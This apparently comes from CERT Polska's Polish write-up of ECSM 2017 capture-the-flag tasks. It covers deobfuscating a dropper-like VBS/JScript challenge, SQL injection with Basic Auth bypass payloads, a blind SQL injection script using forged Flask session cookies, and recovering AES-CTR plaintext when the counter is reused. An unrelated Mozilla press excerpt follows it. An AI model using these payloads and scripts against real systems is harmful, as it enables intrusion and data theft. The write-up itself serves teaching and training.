        + "&hD20D85FD,&hA50AB56B,&h35B5A8FA,&h42B2986C,&hDBBBC9D6,&hACBCF940,&h32D86CE3,&h45DF5C75,&hDCD60DCF,&hABD13D59,&h26D930AC,&h51DE003A,&hC8D75180,&hBFD06116,&h21B4F4B5,&h56B3C423,&hCFBA9599,&hB8BDA50F,&h2802B89E,&h5F058808,&hC60CD9B2,&hB10BE924,&h2F6F7C87,&h58684C11,&hC1611DAB,&hB6662D3D,&h76DC4190,&h01DB7106,&h98D220BC,&hEFD5102A,&h71B18589,&h06B6B51F,&h9FBFE4A5,&hE8B8D433,&h7807C9A2,&h0F00F934,&h9609A88E,&hE10E9818," _
        + "&h7F6A0DBB,&h086D3D2D,&h91646C97,&hE6635C01,&h6B6B51F4,&h1C6C6162,&h856530D8,&hF262004E,&h6C0695ED,&h1B01A57B,&h8208F4C1,&hF50FC457,&h65B0D9C6,&h12B7E950,&h8BBEB8EA,&hFCB9887C,&h62DD1DDF,&h15DA2D49,&h8CD37CF3,&hFBD44C65,&h4DB26158,&h3AB551CE,&hA3BC0074,&hD4BB30E2,&h4ADFA541,&h3DD895D7,&hA4D1C46D,&hD3D6F4FB,&h4369E96A,&h346ED9FC,&hAD678846,&hDA60B8D0,&h44042D73,&h33031DE5,&hAA0A4C5F,&hDD0D7CC9,&h5005713C,&h270241AA," _
        + "&hBE0B1010,&hC90C2086,&h5768B525,&h206F85B3,&hB966D409,&hCE61E49F,&h5EDEF90E,&h29D9C998,&hB0D09822,&hC7D7A8B4,&h59B33D17,&h2EB40D81,&hB7BD5C3B,&hC0BA6CAD,&hEDB88320,&h9ABFB3B6,&h03B6E20C,&h74B1D29A,&hEAD54739,&h9DD277AF,&h04DB2615,&h73DC1683,&hE3630B12,&h94643B84,&h0D6D6A3E,&h7A6A5AA8,&hE40ECF0B,&h9309FF9D,&h0A00AE27,&h7D079EB1,&hF00F9344,&h8708A3D2,&h1E01F268,&h6906C2FE,&hF762575D,&h806567CB,&h196C3671,&h6E6B06E7," _
        + "&hFED41B76,&h89D32BE0,&h10DA7A5A,&h67DD4ACC,&hF9B9DF6F,&h8EBEEFF9,&h17B7BE43,&h60B08ED5,&hD6D6A3E8,&hA1D1937E,&h38D8C2C4,&h4FDFF252,&hD1BB67F1,&hA6BC5767,&h3FB506DD,&h48B2364B,&hD80D2BDA,&hAF0A1B4C,&h36034AF6,&h41047A60,&hDF60EFC3,&hA867DF55,&h316E8EEF,&h4669BE79,&hCB61B38C,&hBC66831A,&h256FD2A0,&h5268E236,&hCC0C7795,&hBB0B4703,&h220216B9,&h5505262F,&hC5BA3BBE,&hB2BD0B28,&h2BB45A92,&h5CB36A04,&hC2D7FFA7,&hB5D0CF31," _
        + "&h2CD99E8B,&h5BDEAE1D,&h9B64C2B0,&hEC63F226,&h756AA39C,&h026D930A,&h9C0906A9,&hEB0E363F,&h72076785,&h05005713,&h95BF4A82,&hE2B87A14,&h7BB12BAE,&h0CB61B38,&h92D28E9B,&hE5D5BE0D,&h7CDCEFB7,&h0BDBDF21,&h86D3D2D4,&hF1D4E242,&h68DDB3F8,&h1FDA836E,&h81BE16CD,&hF6B9265B,&h6FB077E1,&h18B74777,&h88085AE6,&hFF0F6A70,&h66063BCA,&h11010B5C,&h8F659EFF,&hF862AE69,&h616BFFD3,&h166CCF45,&hA00AE278,&hD70DD2EE,&h4E048354,&h3903B3C2," _
        + "&hA7672661,&hD06016F7,&h4969474D,&h3E6E77DB,&hAED16A4A,&hD9D65ADC,&h40DF0B66,&h37D83BF0,&hA9BCAE53,&hDEBB9EC5,&h47B2CF7F,&h30B5FFE9,&hBDBDF21C,&hCABAC28A,&h53B39330,&h24B4A3A6,&hBAD03605,&hCDD70693,&h54DE5729,&h23D967BF,&hB3667A2E,&hC4614AB8,&h5D681B02,&h2A6F2B94,&hB40BBE37,&hC30C8EA1,&h5A05DF1B,&h2D02EF8D"
    honest = Split(joy, ",")
    valuable = Len(justice) : sharing = &HFFFFFFFF
    For l = 1 To valuable:                  
        sharing = honest(((sharing And &HFFFF) Xor Asc(Mid(justice, l, 1))) And &HFF) Xor silence(sharing, 8)
    Next
    sharing = sharing Xor &HFFFFFFFF
    whispering = sharing
End Function

' Wrapper, ktory pozwala konstruowac obiekty Clever z poziomu JScript
Function CallObject(sincerely): Set CallObject = New Clever: End Function

' ExecuteGlobal z curious
Function CreateDOMElement(faith):
    Dim x, y, z: Set y = Nothing
    faith = 0
    x = faith + 25 Xor &HFFFFFFFF
    y = x And &HFFFFFFFF Or 0 + 2555
    ' Tworzy obiekt Excited
    Set CreateDOMElement = new Excited
    z = x
    y = z
End Function


Function curious()
    ' ExecuteGlobal - Function CreateDOMElement....
    curious = silence("&H1836e", 5)
End Function

Dim img: img = curious()

' Wrapper wykorzystujacy getter do wywolania WScript.CreateObject
Class Excited
    Private wonderful
    Public Property Get src ( ): Set src = CreateObject ( wonderful ): End Property
    Public Property Let src ( nice ): wonderful = nice: End Property
End Class

' Stworzenie obiektu ADODB.Stream
Set img = CreateDOMElement("img")
img.src = "ADODB.Stream"
' Stworzenie obiektu Clever
Set weakened = New Clever

Function hate()
    ' RollLeft(hope, 1)
    ' Zwraca wartosc 'hope' obrocona bitowo w lewo o jeden bit
    Dim support, dislike, i
    dislike = hope
    Select Case VarType(dislike)
        Case vbLong
            support = (dislike And "&H3FFFFFFF") * 2
            If dislike And "&H40000000" Then support = support Or "&H80000000"
            If dislike And "&H80000000" Then support = support Or "&H1"
            support = CLng(support)
        Case vbInteger
            support = (dislike And "&H3FFF") * 2
            If dislike And "&H4000" Then support = support Or "&H8000"
            If dislike And "&H8000" Then support = support Or "&H1"
            support = CInt("&H"+ Hex(support))
        Case vbByte
            support = (dislike And "&H7F") * 2
            If dislike And "&H80" Then support = support Or "&H1"
            support = CByte(support)
    End Select
    hate = CLng(support)
End Function

' Zaladowanie do hope sumy CRC pliku 'enjoy.wsf'
hope = whispering(innocent.Read())

Plik wykorzystuje pewną specyficzną właściwość składni komentarzy obu języków skryptowych.

W przypadku VBS – linia komentarza rozpoczyna się apostrofem:

' komentarz vbscript
WScript.echo("hello world")
' /* komentarz jscript */

Dla języka JScript – apostrof stanowi znak rozpoczynający/kończący łańcuch znaków.

' komentarz vbscript
WScript.echo("hello world")
'
/* komentarz jscript */

Mieszanie obu rodzajów komentarzy pozwala przygotować plik, który poprawnie wykona się z użyciem interpreterów obu języków.

Zauważając, że wykomentowane sekcje VBScript zaczynają się od apostrofu – możemy pozyskać kod VBS pozbywając się wszystkich komentarzy:
sed -e "s/'.*//" enjoy.wsf > enjoy.vbs

Teraz możemy podjąć się deobfuskacji (niestety do VBScript ma zbyt wielu narzędzi, które pozwoliłyby uprościć ten proces). Elementy Execute i ExecuteGlobal możemy podejrzeć poprzez skopiowanie ich do osobnego pliku, podmienienie ich na WScript.echo i zwykłe wykonanie tych linii przy użyciu cscript.

Po analizie możemy zauważyć następujące elementy:

Oznacza to, że dowolna modyfikacja kodu może skończyć się wygenerowaniem innej sumy kontrolnej. Aby trudniej było odtworzyć zachowanie funkcji – posłużono się nietypowym wielomianem CRC, zaś sama wartość jest w kilku miejscach niejawnie (w destruktorze) modyfikowana.

Co więcej – okazuje się, że wykorzystana implementacja operacji ROL nie jest do końca poprawna.

Całość sprawia, że samodzielne wyliczenie poprawnej wartości staje się wyjątkowo trudne. Warto wykorzystać oryginalną implementację.

Etap 4: Skrypt JS

Kolejnym wykonywanym elementem jest skrypt w języku JScript. Kod możemy pozyskać posługując się dowolnym narzędziem do reformatowania kodu JavaScript (np. jsbeautifier.org) i wycinając zbędne elementy.

var myself = CallObject("SELF_PROCESS");

var arr = [1, 0x24312313, "./enjoy.wsf",
           function Object.prototype.toString() {
                return CallObject("VBOX_CHECK"), arr[4].src["SvyrRkvfgf".toLower()](arr[2])
           }, CreateDOMElement("a")];
var brr = ["enjoy".toUpper(this),
           (arr[4].src = "Scripting.FileSystemObject"),
           function showFear() {
                return WScript.CreateObject("JFpevcg.Argjbex".toLower())["HfreAnzr".toLower()]
           }, {
            "hey": "handsome"
           }.toString(), showFear()];

function onceAgain(d) {
    for (var k in d) {
        if (brr[k] !== d[k]) {
            (veryWell().Run("uggcf://lbhgh.or/qDj4j9JtKpD".toLower()), true) && veryUgly();
        }
    }
};

onceAgain(({
    0: "prr7pqr4",
    1: false,
    2: "enjoy"
}, {
    3: "hate",
    4: "PLORE-ERQNXPWN"
}, {
    0: "prr7pqr4".toLower(),
    3: true,
    4: "PLORE-ERQNXPWN".toLower()
}))

var setWindow = (function String.prototype.toUpper(th) {
    var SWBem = new th["NpgvirKBowrpg".toLower()]("JorzFpevcgvat.FJorzYbpngbe".toLower());
    var imw = SWBem["PbaarpgFreire".toLower()](".", "/ebbg/PVZI2".toLower());
    CallObject("HI HELLO!")
    var colItems = imw["RkrpDhrel".toLower()]("FRYRPG * SEBZ Jva32_YbtvpnyQvfx Jurer QrivprVQ = 'P:'".toLower());
    var e = new th["Rahzrengbe".toLower()](colItems);
    CallObject("LOVE_FROM_BEST_KOREA");
    for (CallObject("CRYPT_GEN_KEY"); !e.atEnd(); e.moveNext()) {
        return e.item()["IbyhzrFrevnyAhzore".toLower()].toLowerCase();
    }
    return "";
});

function veryWell() {
    return (WScript["CreateObject"]("JFpevcg.Furyy".toLower()));
}

function veryUgly() {
    this["JFpevcg".toLower()]["Dhvg".toLower()](1);
}

var fixit = [(function Number.prototype.checkValue() {
    return this == 1337;
}), (/([A-Z])+/g), (function String.prototype.toLower() {
    return this.replace(/([A-Ma-m])|([N-Zn-z])/g, function(m, p1, p2) {
        return String.fromCharCode(m.charCodeAt(0) + (p1 ? 13 : -13));
    });
})];

function Serenade() {
    var bestkorea = this["JFpevcg".toLower()]["PerngrBowrpg".toLower()]("ZFKZY2.KZYUGGC".toLower());
    'Serenade();';
    bestkorea["Bcra".toLower()]("CBFG".toLower(), "uggc://rpfz2017.preg.cy:6015/ncv/".toLower(), false);
    myself = null;
    bestkorea["Fraq".toLower()](showFear() + "|V|" + hope);
    if (bestkorea["ErfcbafrGrkg".toLower()].substr(0, 4) === "rpfz".toLower()) this["JFpevcg".toLower()]["rpub".toLower()](bestkorea["ErfcbafrGrkg".toLower()]);
    else {
        (veryWell().Run("uggcf://lbhgh.or/4_b47Tf6QD0".toLower()), true) && veryUgly();
    }
}
Serenade();
Deobfuskacja łańcuchów znaków

Na początek przyjrzyjmy się łańcuchom znaków:

function onceAgain(d) {
    for (var k in d) {
        if (brr[k] !== d[k]) {
            (veryWell().Run("uggcf://lbhgh.or/qDj4j9JtKpD".toLower()), true) && veryUgly();
        }
    }
};

Względnie łatwo zauważyć, że jest tutaj wykorzystywany algorytm ROT13. Implementacja znajduje się w tym miejscu:

var fixit = [(function Number.prototype.checkValue() {
    return this == 1337;
}), (/([A-Z])+/g), (function String.prototype.toLower() {
    return this.replace(/([A-Ma-m])|([N-Zn-z])/g, function(m, p1, p2) {
        return String.fromCharCode(m.charCodeAt(0) + (p1 ? 13 : -13));
    });
})];

Jakim cudem to działa? Ta konstrukcja wykorzystuje dwa elementy: Hoisting deklaracji funkcji i mechanizm prototypów.

Oba elementy języka są powszechnie wykorzystywane w JavaScript, ale nigdy jednocześnie. Deklaracja function A.prototype.B(...) {} nie jest zgodna ze składnią ECMAScript i jest specyficzna wyłącznie dla języka JScript. Pozwala to na określanie/przeciążanie metod dla obiektów String/Object/itd. w dowolnym miejscu scope’a.

Fakt niezgodności niesie za sobą dodatkowy problem – spora część parserów zgodnych z ES nie będzie w stanie poprawnie przeanalizować kodu zawierającego takie wyrażenia. Dotyczy to m.in. UglifyJS i (do niedawna) emulatora box-js – Pull request dla box-js wprowadzający wsparcie dla function A.B.

ROT13 możemy prosto zdekodować poniższym skryptem (Node.js):

var fs = require("fs");
var code = fs.readFileSync("writeup-enjoy.js").toString()
var deobfuscated = code.replace(/"(.+?)"\.toLower\(\)/g, (function(m, txt) {
        var replaced = txt.replace(/([A-Ma-m])|([N-Zn-z])/g, function(m, p1, p2) {
            return String.fromCharCode(m.charCodeAt(0) + (p1 ? 13 : -13));
        })
        return '"'+replaced+'"'
    }));
fs.writeFileSync("enjoy.deobf.js", deobfuscated);
Make droppers great onceAgain!

Pierwszym interesującym elementem jaki rzuca się w oczy po deobfuskacji jest wywołanie onceAgain:

function onceAgain(d) {
    for (var k in d) {
        if (brr[k] !== d[k]) {
            (veryWell().Run("https://youtu.be/dQw4w9WgXcQ"), true) && veryUgly();
        }
    }
};

onceAgain(({
    0: "prr7pqr4",
    1: false,
    2: "enjoy"
}, {
    3: "hate",
    4: "PLORE-ERQNXPWN"
}, {
    0: "cee7cde4",
    3: true,
    4: "CYBER-REDAKCJA"
}))

Funkcja sprawdza, czy wartości pod poszczególnymi kluczami argumentu zgadzają się z wartościami w tablicy brr. W razie niezgodności – otwierane jest okno przeglądarki z rickrollem a sam skrypt jest zamykany (veryUgly()).

Poszczególne elementy tablicy brr zawierają następujące infomacje:

Jeśli onceAgain wykona się poprawnie, przechodzimy do wywołania Serenade.

Funkcja Serenade

Funkcja Serenade wygląda następująco:

function Serenade() {
    var bestkorea = this["WScript"]["CreateObject"]("MSXML2.XMLHTTP");
    'Serenade();';
    bestkorea["Open"]("POST", "http://ecsm2017.cert.pl:6015/api/", false);
    myself = null;
    bestkorea["Send"](showFear() + "|V|" + hope);
    if (bestkorea["ResponseText"].substr(0, 4) === "ecsm") this["WScript"]["echo"](bestkorea["ResponseText"]);
    else {
        (veryWell().Run("https://youtu.be/4_o47Gs6DQ0"), true) && veryUgly();
    }
}

Jej zadaniem jest pobranie z serwera poszukiwanej przez nas „próbki” – w tym wypadku flagi rozpoczynającej sie od „ecsm”. W tym celu wykonywane jest żądanie POST pod adres http://ecsm2017.cert.pl:6015/api/. Żądanie ma następujący format: <nazwa uzytkownika>|V|<suma kontrolna (ze znakiem)>
Jeśli zostaną przesłane poprawne dane – endpoint zwróci flagę. W przeciwnym wypadku – kod 404 co skończy się uruchomieniem kolejnego „rickrolla”.

Etap 5: Rozwiązanie

Dotarliśmy do końca analizy. Docelowe rozwiązanie wygląda następująco:

Ważne jest, aby całość wykonać robiąc jak najmniej zmian – w niektórych miejscach w kodzie wyzwalany jest destruktor Clever. Aby suma była poprawna, musi być wywołany odpowiednią liczbę razy.

Dlaczego?

Idea działania dropperów jest względnie prosta – są to pliki wykonywalne, których głównym zadaniem jest pobranie i instalacja złośliwego oprogramowania. Zdarza się jednak, że prostota idzie w parze z silną obfuskacją i licznymi utrudnieniami w analizie. Przy tworzeniu tego zadania część sztuczek została zaczerpnięta z prawdziwych złośliwych skryptów, które pojawiają się w spamie.

Zadanie miało na celu przybliżyć proces analizowania wyjątkowo „złośliwego” skryptu. Bardzo często w przypadku wszelkiego rodzaju crack-me opartych na językach skryptowych, do rozwiązania wystarczy doprowadzenie skryptu do czytelnej postaci. W tym wypadku – problemem staje się sam język.

Podwójne uwierzytelnianie

Odnośniki na stronie z zadaniem mają postać adresu /index.php/instructions. Próbując odwiedzić nieistniejącą stronę, np. /index.php/abc aplikacja zwraca nam następujący błąd:

Warning: include(abc.php): failed to open stream: No such file or directory in /var/www/html/index.php on line 30
Warning: include(): Failed opening 'abc.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/index.php on line 30

Błąd dołączenia pliku abc.php może nam sugerować, że aplikacja wykonuje kod zbliżony do include($parametr . '.php'). Możemy w takim razie spróbować użyć wrappera php:// jako protokołu w adresie, a konkretnie filtru convert.base64-decode do odczytania kodu źródłowego z plików aplikacji.

I faktycznie po odwiedzeniu adresu: /index.php/php://filter/read=convert.base64-encode/resource=index dostajemy zawartość index.php:
PD9waHAKb2Jfc3RhcnQoKTsKZGVmaW5lK...

Ze wszystkich dostępnych plików zdecydowanie najciekawszym jest instructions.php:

<?php if(!defined('APP')) { die('직접 접근 금지'); }

$ip = $_SERVER['HTTP_CLIENT_IP'] ?: ($_SERVER['HTTP_X_FORWARDED_FOR'] ?: $_SERVER['REMOTE_ADDR']);

function ip_in_range($ip, $min, $max) {
    return (ip2long($min) <= ip2long($ip) && ip2long($ip) <= ip2long($max));
}

if(ip_in_range($ip, '175.45.176.0', '175.45.179.255') ||
   ip_in_range($ip, '210.52.109.0', '210.52.109.255') ||
   ip_in_range($ip, '77.94.35.0', '77.94.35.255')) {
   
    if (!isset($_SERVER['PHP_AUTH_USER'])) {
        header('HTTP/1.0 401 Unauthorized');
        header('WWW-Authenticate: Basic realm="LOGIN"');
    } else {
        $login = $_SERVER['PHP_AUTH_USER'];
        $password = $_SERVER['PHP_AUTH_PW'];
       
        $db = new PDO('sqlite:database.sqlite3');

        $result = $db->query("select login, password from users where login = '$login'");
        if (!$result) { die($db->errorInfo()[2]); }
        $data = $result->fetchAll();

        if(count($data) == 0) {
            header('HTTP/1.0 401 Unauthorized');
            header('WWW-Authenticate: Basic realm="NO USER"');
        } elseif (md5($password) !== $data[0]['password']) {
            header('HTTP/1.0 401 Unauthorized');
            header('WWW-Authenticate: Basic realm="WRONG PASSWORD"');
        } else {
            print '<h2>안녕하십니까</h2>';

            $result = $db->query("select message from instructions where login = '{$data[0]['login']}'");
            if (!$result) { die($db->errorInfo()[2]); }
            $data = $result->fetchAll();

            if(count($data) == 0) {
                print('<h3>메시지 없음</h3>');
            } else {
                print '<h3>여기에 당신을위한 메시지가 있습니다.:</h3>';

                foreach($data as $row) {
                    print "<p>- {$row['message']}</p>";
                }
            }
        }
    }
} else {
    ?>
        <p>귀하의 지적 재산권은 영광 된 북한에 속해 있지 않습니다. VPN을 사용하면 사용자 이름과 비밀번호로 로그인 할 수 있습니다.</p>
    <?php
}

?>

Treść zadania sugerowała nam, że mamy odzyskać wiadomość użytkownika, którego nazwy nie znamy. Musimy po drodze przejść kilka warunków:

Pierwszy z nich to ograniczenie na adres IP.

Jednak po poniższym kodzie widzimy, że możemy oszukać aplikację podając sfabrykowaną wartość w nagłówku X-Forwarded-For – serwer powinien dodatkowo weryfikować czy jest to informacja z zaufanego serwera proxy.

$ip = $_SERVER['HTTP_CLIENT_IP'] ?: ($_SERVER['HTTP_X_FORWARDED_FOR'] ?: $_SERVER['REMOTE_ADDR']);

Następnym błędem w aplikacji to przekazanie parametrów do zapytań SQL powodujący możliwość wykonania SQL injection. Parametr, w którym możemy umieścić nasz payload to nazwa użytkownika podana w mechaniźmie HTTP Basic Auth.

$result = $db->query("select login, password from users where login = '$login'");
$data = $result->fetchAll();
$result = $db->query("select message from instructions where login = '{$data[0]['login']}'");

Możemy dzięki temu zadanie rozwiązać na kilka sposobów.

Pierwszy z nich to wybranie nieznanej nam nazwy użytkownika już w pierwszym zapytaniu:

username = "' union select (select login from users limit 1 offset 1), '098f6bcd4621d373cade4e832627b4f6' --"
password = 'test'

Musimy również podać „prawidłowe” hasło – a raczej zwrócić z zapytania hash md5 zgodny z hasłem podanym w HTTP Basic Auth.

Modyfikując offset w powyższym zapytaniu możemy pobrać wiadomości dowolnego użytkownika. W naszym przypadku był to drugi użytkownik.

Kolejna metoda to zwrócenie kolejnego SQL injection jako login, który będzie użyty w drugim zapytaniu:

username = "' union select "\'or 1=1 --", '098f6bcd4621d373cade4e832627b4f6' --"
password = '
test'

Można było też odzyskać login naszego użytkownika za pomocą blind SQL Injection.

Odzyskana flaga to ecsm{cyber.szpiegostwo}.

Memo Service

W pliku robots.txt możemy znaleźć informację o dwóch interesujących plikach: server.py oraz server.pyc.

O ile pierwszego z nich nie jesteśmy w stanie pobrać, to drugi zwraca nam skompilowany bytecode aplikacji w języku Python.

Po zdekompilowaniu narzędziem uncompyle6 otrzymujemy następujący kod źródłowy:

# uncompyle6 version 2.12.0
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.13 (default, Jan 19 2017, 14:48:08)
# [GCC 6.3.0 20170118]
# Embedded file name: /opt/memo/server.py
# Compiled at: 2017-10-30 14:42:54
from flask import Flask, session, render_template, request, redirect
from uuid import uuid4
from setup_server import cursor
app = Flask(__name__)
app.secret_key = 'lz2fhklkScDccJbseN3E'

@app.route('/')
def index():
    session['id'] = session.get('id', str(uuid4()))
    cursor.execute("select count(*) from users where user_id='%s'" % session['id'])
    new_user = int(cursor.fetchone()[0]) == 0
    cursor.execute('select memo from memos where user_id=?', [session['id']])
    memos = [ x[0] for x in cursor.fetchall() ]
    return render_template('index.html', memos=memos, new_user=new_user)


@app.route('/save', methods=['POST'])
def save_memo():
    session['id'] = session.get('id', str(uuid4()))
    cursor.execute('insert into memos values (?, ?)', (request.form.get('memo'), session['id']))
    return redirect('/', code=302)


@app.route('/accept_cookies', methods=['POST'])
def accept_cookies():
    cursor.execute('insert into users values (?)', [session['id']])
    return redirect('/', code=302)
# okay decompiling server.pyc

Z powyższego kodu można wyciągnąć dwie ważne informacje:

Jeśli zbadamy działanie aplikacji to zauważymy, że argument new_user odpowiada za wyświetlanie informacji o ciasteczkach dla nowych użytkowników.

Jeśli połączymy wszystkie zebrane wiadomości to już jesteśmy rozwiązać zadanie:

Cały atak można zapisać w formie prostego skryptu w języku Python:

from flask import Flask, session
from flask.sessions import SecureCookieSessionInterface

app = Flask("example")
app.secret_key = "lz2fhklkScDccJbseN3E"
session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)

import sys
import requests

url = "http://localhost:5000/"

def query(payload):
    session = {'id':payload}
    r = requests.get(url=url, cookies={'session':session_serializer.dumps(session)})
    if(r.text.find("display: none") == -1):
        return 0
    else:
        return 1

def queryLetter(payload):
    b = ""
    for i in range(8):
        b += str(query(payload.format(str(i))))
    print(b[::-1])
    return (int(b[::-1], 2))

out = ""
for i in range(1, 100):
    # Znalezienie tabeli/kolumny
    # letter = queryLetter("a' or (unicode(SUBSTR((SELECT name FROM sqlite_master WHERE type='table' limit 1 offset 2),"+str(i)+", 1)) >> {} & 1);--")

    letter = queryLetter("a' or (unicode(SUBSTR((SELECT * FROM this_doesnt_look_like_a_table_with_flag),"+str(i)+", 1)) >> {} & 1);--")

    if not letter:
        break

    out += chr(letter)

print(out)

Przepełnienie Stosu

Zadanie

W założeniu było to proste zadanie – być może nawet najprostsze zadanie na ECSM2017.

Dostajemy zaszyfrowany plik oraz informację, że został zaszyfrowany kodem znajdującym się pod adresem: https://github.com/WillyWu0201/CryptorRandomFile/blob/master/PyCrypto_AES_256_CTR.py.

Jako twórcy zadania ryzykowaliśmy trochę linkując do źródła którego nie kontrolowaliśmy. Na szczęście właściciel nie zdecydował się złośliwie podmienić go podczas konkursu, ale na wszelki wypadek na przyszłośc kopiujemy je poniżej:

# -*- coding: utf-8 -*-

from __future__ import absolute_import, division, unicode_literals

import os
from Crypto.Cipher import AES

_IV = os.urandom(16) # 產生隨機亂數IV
_KEY = os.urandom(32) # 設定Key
_COUNTER = os.urandom(16)
_BlockSize = AES.block_size # Block Size

#padding
_Pad = lambda s: s + (_BlockSize - len(s) % _BlockSize) * chr(_BlockSize - len(s) % _BlockSize)
_Unpad = lambda s : s[0:-ord(s[-1])]

# 使用CTR加密
def aes_encrypt(data):
    cryptor = AES.new(_KEY, AES.MODE_CTR, counter=lambda: _COUNTER)
    return cryptor.encrypt(_Pad(data))

# 使用CTR解密
def aes_decrypt(data):
    cryptor = AES.new(_KEY, AES.MODE_CTR, counter=lambda: _COUNTER)
    return _Unpad(cryptor.decrypt(data))

# encrypt = aes_encrypt('encrypt this CTR 123123213122131213')
# print (encrypt)
# decrypt = aes_decrypt(encrypt)
# print (decrypt)

Analiza

Jak widać, mamy tu funkcje służące do szyfrowania i deszyfrowania AES-em.

AES jest mocnym algorytmem szyfrowania, a tryb CTR jest równie dobry (albo lepszy) niż stary dobry CBC.

W dodatku stałe są losowane w bezpieczny sposób, więc ataki na słabą losowośc odpadają:

_IV = os.urandom(16) # 產生隨機亂數IV
_KEY = os.urandom(32) # 設定Key
_COUNTER = os.urandom(16)

Na pierwszy rzut oka może więc wydawać się że zadanie jest nierozwiązywalne albo dramatycznie trudne – nie jest jednak tak źle!

Ponieważ jeśli ktoś jest zaznajomiony (albo przekartkuje artykuł na Wikipedii) z trybem CTR, prawdopodobnie od razu wyda mu się podejrzany fragment:

# 使用CTR加密
def aes_encrypt(data):
    cryptor = AES.new(_KEY, AES.MODE_CTR, counter=lambda: _COUNTER)
    return cryptor.encrypt(_Pad(data))

counter to dziwny element API PyCrypto – ten parametr to funkcja która powinna zwracać za każdym razem kolejną wartość licznika (po szczegóły trybu CTR odsyłamy do Wikipedii). Ważne jest to, żeby nigdy nie powtarzała się wartośc zwracana przez tą funkcję dla jednego klucza. A tymczasem w tym przykładzie funkcja counter zwraca zawsze tę samą wartość (16 bajtów wylosowane na początku programu)! Jest to ważne, bo, jak wynika z działania metory CTR:

Jeśli licznik powtórzy się chociaż raz, to całe szyfrowanie sprowadza się do przeprowadzenia operacji xor.

Atak

Pozostaje pytanie, jak złamać takie szyfrowanie z operacją xor.

Wiemy (albo raczej – możemy się domyśleć z rozszerzenia) że zaszyfrowany został plik pdf. Pliki pdf mają dość charaketerystyczny nagłówek. Konkretnie, stałe jest:

%PDF-<numer-wersji>
%

Czyli na przykład:

%PDF-1.4
%

(Zamiast 4 zdarzają się inne pomniejsze wersje – w zadaniu była wersja 1.4 co można było np. zgadnąć, albo poprawić później)

Czyli szesnastkowo: 25 50 44 46 2d 31 2e 34 0a 25.

Jako że cały ciphertext jest wynikiem operacji xor z 16bajtowym kluczem, nazwijmy:

Wiemy więc że pt0 ^ klucz = ct0.

Co więcej, generalizuje się to dalej, np:

itd.

Gdybyśmy mieli cały klucz, moglibyśmy banalnie odzyskać cały plaintext przekształcając te równania:

pt0 = ct0 ^ klucz
pt1 = ct1 ^ klucz

Niestety nie mamy całego klucza, ale możemy odzyskać jego początek! Bo dalej przekształacając równanie:

pt0 ^ ct0 = klucz

Więc jeśli znamy pierwsze X bajtów ciphertextu i plaintextu (a znamy), to znamy też pierwsze bajty klucza.

Można w ten sposób odzyskać klucz i spróbować coś zdeszyfrować – spróbujmy napisać kod:

# -*- coding: utf-8 -*-

import sys

def blocks(data, n):
    """ split data to n-byte chunks """
    return [data[i*n:(i+1)*n] for i in range(len(data)/n)]

def safe(string):
    """ replace non-printable characters with dot '.' """
    return ''.join(c if 32 <= ord(c) < 0x7f else '.' for c in string)

def xor(a, b):
    """ xor 'a' and 'b' messages with each other """
    return ''.join(chr(ord(ac) ^ ord(bc)) for ac, bc in zip(a, b))

def main():
    data = open(sys.argv[1], 'rb').read()
    prefix = "255044462d312e340a25".decode('hex')
    prefix = prefix + '\x00' * (16 - len(prefix))  # pad prefix to 16 bytes
    chunks = blocks(data, 16)

    key = xor(chunks[0], prefix)

    for chunk in chunks[:10]: # decrypt first 10 chunks
         print safe(xor(chunk, key))


if __name__ == '__main__':
    main()

I sprawdźmy wynik:

╰─$ python decrypt.py output.pdf.enc
%PDF-1.4.%......
 0 obj.<</....~^
r (Mozilla....*m
(X11; Linu....<n
64\) Apple....cE
/537.36 \(....F.
 like Geck....IY
rome/61.0.....$.
00 Safari/....9.
)./Produce....aX

Doskonale, pierwsze bajty faktycznie zostały poprawnie zdeszyfrowane! Niestety, dalej jest ciężko. Ale możemy tę linię rozumowania pociągnąć dalej. Np. w bloku (X11; Linu....<n dość łatwo się domyślić że kolejnym znakiem będzie x z Linux, a w like Geck....IY kolejnym znakiem będzie o jak Gecko – a po nich pewnie spacja. Z tego możemy wyliczyć kolejne bajty klucza i ponownie uruchomić algorytm:

%PDF-1.4.%......
 0 obj.<</Cr..~^
r (Mozilla/5..*m
(X11; Linux ..<n
64\) AppleWe..cE
/537.36 \(KH..F.
 like Gecko\..IY
rome/61.0.31..$.
00 Safari/53..9.
)./Producer ..aX

Ty, razem na przykład rzuca się w oczy 64\) AppleWe..cE który może być tylko AppleWebKitem. To już wystarczy do odzyskania pełnego klucza, i pełnego pliku pdf.

Artykuł Rozwiązania zadań z konkursu Capture The Flag w ramach ECSM 2017 pochodzi z serwisu CERT Polska.

Mateusz Szymaniec, 28 listopada 2017, 11:54

20 listopada 2017

Centrum prasowe Mozilli

Prywatne przeglądanie w Firefoksie czy tryb Incognito w Chrome: który jest szybszy?

Wraz z premierą przeglądarki Firefox Quantum postanowiliśmy połączyć siły z Disconnect Inc., aby porównać czas ładowania strony w trybie incognito przeglądarki Chrome i prywatnego przeglądania w Firefox Quantum.


Firefox Quantum to najszybsza wersja Firefoksa jaką do tej pory stworzyliśmy. Jest dwa razy szybsza od Firefoksa 52 i wielu przypadkach szybsza od najnowszej wersji przeglądarki Chrome – porównaliśmy ich działanie na kilku stronach. Dzięki przeprowadzeniu testów wydajności mogliśmy wyeliminować niepotrzebne opóźnienia i zapewnić naszym użytkownikom jak najlepsze doświadczenia.

Większość testów porównujących wydajność przeglądarek skupia się na korzystaniu ze zwykłego trybu przeglądania. Ale co z przeglądaniem prywatnym? Biorąc pod uwagę fakt, że korzystanie z tej funkcji jest powszechne, chcieliśmy sprawdzić, jak wypada przeglądanie prywatne w Firefoksie w porównaniu z trybem incognito w Chrome pod względem czasu wczytywania strony (czas między kliknięciem a wyświetleniem strony na ekranie).

Uwaga spoiler… Prywatne przeglądanie w Firefox Quantum jest szybkie… naprawdę szybkie

Dlaczego wydajność prywatnego przeglądania może się różnić?

Strony internetowe mają możliwość ładowania treści i uruchamiania skryptów z różnych źródeł. Niektóre z tych skryptów obejmują moduły śledzenia. Są one używane z wielu powodów, od analityki internetowej do śledzenia zaangażowania na stronie w celu ukierunkowanej reklamy. Korzystanie z trackerów na stronach internetowych jest bardzo powszechne. Niestety moduły śledzące mogą opóźnić proces ładowania strony, ponieważ przeglądarka czeka na odpowiedź skryptów śledzenia.

